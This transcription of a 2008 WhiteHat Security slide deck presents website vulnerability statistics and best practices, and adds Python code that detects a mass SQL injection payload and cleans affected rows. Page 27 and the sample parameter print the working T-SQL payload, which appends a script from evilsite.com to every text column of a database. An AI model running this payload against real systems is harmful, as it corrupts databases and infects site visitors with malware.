statistics - top website vulnerabilities

© 2008 WhiteHat Security, Inc. Top Website Vulnerabilities: “Trends, Effects on Governmental Cyber Security, How to Fight Them.” Jeremiah Grossman WhiteHat Security founder & CTO


Page 1: Statistics - Top Website Vulnerabilities

Top Website Vulnerabilities: “Trends, Effects on Governmental Cyber Security, How to Fight Them.”

Jeremiah Grossman, WhiteHat Security founder & CTO

Page 2: Statistics - Top Website Vulnerabilities

Jeremiah Grossman, WhiteHat Security Founder & CTO

• Technology R&D and industry evangelist (InfoWorld's CTO Top 25 for 2007)

• Frequent international conference speaker

• Co-founder of the Web Application Security Consortium

• Co-author: Cross-Site Scripting Attacks

• Former Yahoo! information security officer

Page 3: Statistics - Top Website Vulnerabilities

Job Description: Hack Everything!

Official Title: “the hacker yahoo”

Page 4: Statistics - Top Website Vulnerabilities

Protect this website and the ~599 others

Find the vulnerabilities before the bad guys


Page 5: Statistics - Top Website Vulnerabilities


Page 6: Statistics - Top Website Vulnerabilities

WhiteHat Sentinel

• Unlimited Assessments – customer controlled and expert managed – the ability to scan websites no matter how big or how often they change

• Coverage – authenticated scans to identify technical vulnerabilities and custom testing to uncover business logic flaws

• Virtually Eliminate False Positives – Operations Team verifies results and assigns the appropriate severity and threat rating

• Development and QA – WhiteHat Satellite Appliance allows us to service intranet-accessible systems remotely

• Improvement & Refinement – real-world scans enable fast and efficient updates

Page 7: Statistics - Top Website Vulnerabilities

Vulnerability Stack

[Figure: the vulnerability stack – Symantec, Qualys, Nessus and nCircle cover the “well-known” vulnerabilities layer; WhiteHat Security covers custom web applications.]

Custom Web Applications, Custom Vulnerabilities

Data is unique from reports distributed by Symantec, Mitre (CVE), IBM (ISS) X-Force, SANS, and others. These organizations track publicly disclosed vulnerabilities in commercial and open source software products, which may contain Web application flaws as well. WhiteHat Security’s data is different because it focuses solely on previously unknown vulnerabilities in custom web applications, code unique to that organization, on real-world websites.

Page 8: Statistics - Top Website Vulnerabilities

168,000,000 websites

millions more added per month


Page 9: Statistics - Top Website Vulnerabilities

809,000 websites use SSL

protecting passwords, credit card numbers, social security numbers, and our email (if we’re lucky).

Page 10: Statistics - Top Website Vulnerabilities

9 out of 10 websites have vulnerabilities

allowing hackers unauthorized access


Page 11: Statistics - Top Website Vulnerabilities

hacked


Page 12: Statistics - Top Website Vulnerabilities

A new infected Web page is discovered every 5 seconds, 24 hours a day, 365 days a year.

Over 79% of websites hosting malicious code are legitimate (compromised by attackers).

Page 13: Statistics - Top Website Vulnerabilities

Likelihood that a website has a vulnerability, by class

WhiteHat Security: Top 10

Page 14: Statistics - Top Website Vulnerabilities

Likelihood that a website has a vulnerability, by severity

But how bad is it really?

Websites with Urgent, Critical, or High severity issues technically would not pass PCI compliance.

Page 15: Statistics - Top Website Vulnerabilities

Percentage of vulnerabilities ranked by severity

Another way to look at the badness

Page 16: Statistics - Top Website Vulnerabilities

Overall vulnerability population

Page 17: Statistics - Top Website Vulnerabilities

Technology Breakdown: file extensions

Page 18: Statistics - Top Website Vulnerabilities

Industry Verticals: percentage of websites with either URGENT, CRITICAL or HIGH severity vulnerabilities, ranked by industry

Page 19: Statistics - Top Website Vulnerabilities

Worst of the Worst: percentage of vulnerability classes in the overall population, ranked by industry

Page 20: Statistics - Top Website Vulnerabilities

Data input correlation

Average inputs per website: 154

Ratio of vulnerability/inputs: 2.2%

Page 21: Statistics - Top Website Vulnerabilities

Average Time to Fix in Days

[Chart: average time to fix, in days; axis ticks at 180, 270 and 365.]

Page 22: Statistics - Top Website Vulnerabilities

Website            Founded
Amazon             1994
Yahoo              1995
eBay               1995
Bank of America    1997
Google             1998
MySpace            2003
YouTube            2005

Vulnerability / Attack         Year
Buffer Overflow                1996
Command Injection              1996
SQL Injection                  2004
XSS                            2005
Predictable Resource Location  ?
HTTP Response Splitting        2005 / ?
CSRF                           ?

More major websites were launched before significant classes of attack were “well-known”.

Page 23: Statistics - Top Website Vulnerabilities

If there’s just 1 vulnerability on 90% of the SSL websites... Other reports say an average of 7.

728,100 total vulnerabilities

Page 24: Statistics - Top Website Vulnerabilities

XSSed.com has reported:

20,843 total vulnerabilities

1,072 fixed (5%)


Page 25: Statistics - Top Website Vulnerabilities


Page 26: Statistics - Top Website Vulnerabilities

Mass SQL Injection

1. Google recon for weak websites (*.asp, *.php)
2. Generic SQL Injection populates databases with malicious JavaScript IFRAMEs.
3. Visitors arrive (U.N., DHS, etc.) and their browser auto-connects to a malware server, infecting their machine with trojans.
4. Botnets form which then continue SQL injecting websites.

Page 27: Statistics - Top Website Vulnerabilities

-- The injected payload from the slide. It walks every user table (xtype 'u') and
-- every text-type column (99 = ntext, 35 = text, 231 = nvarchar, 167 = varchar)
-- and appends a remote script tag to each stored value.
DECLARE @T varchar(255), @C varchar(255);
DECLARE Table_Cursor CURSOR FOR
  SELECT a.name, b.name
  FROM sysobjects a, syscolumns b
  WHERE a.id = b.id AND a.xtype = 'u' AND
    (b.xtype = 99 OR b.xtype = 35 OR b.xtype = 231 OR b.xtype = 167);
OPEN Table_Cursor;
FETCH NEXT FROM Table_Cursor INTO @T, @C;
WHILE (@@FETCH_STATUS = 0) BEGIN
  -- One dynamic UPDATE per (table, column) pair found by the cursor.
  EXEC('update [' + @T + '] set [' + @C + '] = rtrim(convert(varchar,[' + @C + ']))
        + ''<script src=http://evilsite.com/1.js></script>''');
  FETCH NEXT FROM Table_Cursor INTO @T, @C;
END;
CLOSE Table_Cursor;
DEALLOCATE Table_Cursor;

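Two defender-side checks for the payload above, written as an added example (not code from the slides or from WhiteHat Security): a request-parameter detector that recognises the cursor/sysobjects pattern, including after CAST(0x…) hex encoding, which goes beyond what the slide shows, and a scan over exported text columns that finds and strips the appended script tag. The sample parameter and rows are constructed for the example.

```python
import re

# Tokens that together identify the cursor-driven payload on the slide: it
# enumerates sysobjects/syscolumns and EXECs an UPDATE for every text column.
PAYLOAD_TOKENS = ("declare", "cursor", "sysobjects", "syscolumns", "exec(")
# CAST(0x... AS varchar) hex literal; generalization beyond the slide, since the
# payload is often delivered hex-encoded so no SQL keyword appears in the URL.
HEX_CAST = re.compile(r"cast\(\s*0x([0-9a-f]+)\s+as\s+n?(?:var)?char", re.I)
# The tag the payload appends to every varchar/text column it can reach.
INJECTED_TAG = re.compile(r"<script\s+src=[^>]*>\s*</script>", re.I)

def normalize(param: str) -> str:
    """Lower-case a request parameter after decoding any CAST(0x..) hex blobs."""
    def decode(m):
        try:
            raw = bytes.fromhex(m.group(1))
        except ValueError:
            return m.group(0)
        # Drop NUL bytes so both ASCII and UTF-16LE (NVARCHAR) payloads decode.
        return raw.replace(b"\x00", b"").decode("latin-1")
    return HEX_CAST.sub(decode, param).lower()

def is_mass_sqli_request(param: str) -> bool:
    """True when a query-string value carries the mass SQL injection payload."""
    text = normalize(param)
    return all(tok in text for tok in PAYLOAD_TOKENS)

def find_injected_rows(rows):
    """Return (table, column, row_id, cleaned_value) for each row carrying the tag."""
    hits = []
    for table, column, row_id, value in rows:
        if isinstance(value, str):
            cleaned, count = INJECTED_TAG.subn("", value)
            if count:
                hits.append((table, column, row_id, cleaned))
    return hits

# Constructed sample data (not from the slides): an injected request parameter
# and three exported rows as they would look after the payload has run.
SAMPLE_PARAM = (
    "1;DECLARE @T varchar(255),@C varchar(255);DECLARE Table_Cursor CURSOR FOR SELECT "
    "a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id;OPEN Table_Cursor;"
    "FETCH NEXT FROM Table_Cursor INTO @T,@C;WHILE(@@FETCH_STATUS=0)BEGIN EXEC('update "
    "['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''<script src=http://evilsite"
    ".com/1.js></script>''');FETCH NEXT FROM Table_Cursor INTO @T,@C;END;CLOSE Table_Cursor")
SAMPLE_ROWS = [
    ("Products", "Name", 1, "Widget<script src=http://evilsite.com/1.js></script>"),
    ("Products", "Name", 2, "Gadget"),
    ("News", "Body", 7, "Hello<script src=http://evilsite.com/1.js></script>"),
]
```

Run `find_injected_rows` over a dump of every text column the cursor would have reached; the cleaned values are what an UPDATE to restore the rows should write back.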

Page 28: Statistics - Top Website Vulnerabilities


Page 29: Statistics - Top Website Vulnerabilities

2006 - 0.3% of all Internet queries return at least one URL containing malicious content.

2007 - 1.3%

2008 - ?

Page 30: Statistics - Top Website Vulnerabilities


Page 31: Statistics - Top Website Vulnerabilities


Page 32: Statistics - Top Website Vulnerabilities

Best Practices

Asset Tracking – Find your websites, assign a responsible party, and rate their importance to the business. Because you can’t secure what you don’t know you own.

Measure Security – Perform rigorous and on-going vulnerability assessments, preferably every week. Because you can’t secure what you can’t measure.

Development Frameworks – Provide programmers with software development tools enabling them to write code rapidly that also happens to be secure. Because you can’t mandate secure code, only help it.

Defense-in-Depth – Throw up as many roadblocks to attackers as possible. This includes custom error messages, Web application firewalls, security with obscurity, and so on. Because 9 in 10 websites are already insecure, no need to make it any easier.

Page 33: Statistics - Top Website Vulnerabilities

For more information visit: www.whitehatsec.com/

Jeremiah Grossman, founder and CTO
blog: http://jeremiahgrossman.blogspot.com/
email: [email protected]

Thank You